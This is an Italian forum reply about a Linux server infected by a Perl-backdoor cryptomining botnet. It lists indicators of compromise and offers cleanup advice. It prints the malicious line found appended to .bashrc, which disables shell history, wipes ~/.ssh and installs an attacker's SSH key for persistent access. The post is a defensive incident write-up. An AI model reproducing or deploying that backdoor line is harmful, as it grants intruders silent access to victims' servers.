Lo stesso è successo a me e l'ho notato ieri. Ho controllato il file /var/log/syslog
e questo IP (185.234.218.40) sembrava eseguire automaticamente cronjobs.
L'ho controllato su http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) e ha alcuni rapporti. Questi file sono stati modificati dal trojan:
- .bashrc
- .ssh / authorized_keys
Ho trovato questo alla fine .bashrc
(che viene eseguito ogni volta bash è aperto):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Sta eliminando il tuo authorized_keys
file, che è un elenco di chiavi SSH che possono connettersi senza password. Quindi, aggiunge la chiave SSH dell'attaccante:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Inoltre, ho trovato questa cartella:, /tmp/.X13-unix/.rsync
dove si trova tutto il malware. Ho anche trovato un file, /tmp/.X13-unix/.rsync/c/ip
un file contenente 70.000 indirizzi IP, che molto probabilmente sono altre vittime o server di nodi.
Esistono 2 soluzioni: A:
Aggiungi un firewall che blocca tutte le connessioni in uscita tranne la porta 22 e altre che ritieni necessarie e abilita fail2ban, un programma che vieta un indirizzo IP dopo X tentativi di password falliti
Uccidi tutti i lavori cron:,
ps aux | grep cron
quindi uccidi il PID che viene visualizzato
Cambia la tua password in una sicura
B:
Eseguire il backup di tutti i file o cartelle necessari o desiderati
Ripristina il server e reinstalla Ubuntu o crea direttamente un nuovo droplet
Come ha detto Thom Wiggers, fai sicuramente parte di una botnet di mining bitcoin e il tuo server ha una backdoor . La backdoor utilizza un exploit perl, un file che si trova qui /tmp/.X13-unix/.rsync/b/run
:, contenente questo ( https://pastebin.com/ceP2jsUy )
Le cartelle più sospette che ho trovato sono:
Infine, c'è un articolo relativo alla Perl Backdoor qui:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Spero che lo trovi utile
.firefoxcatche
probabilmente non ha nulla a che fare con Firefox - potrebbe essere solo un minatore di bitcoin? Prova a caricare i file eseguibili su virustotal.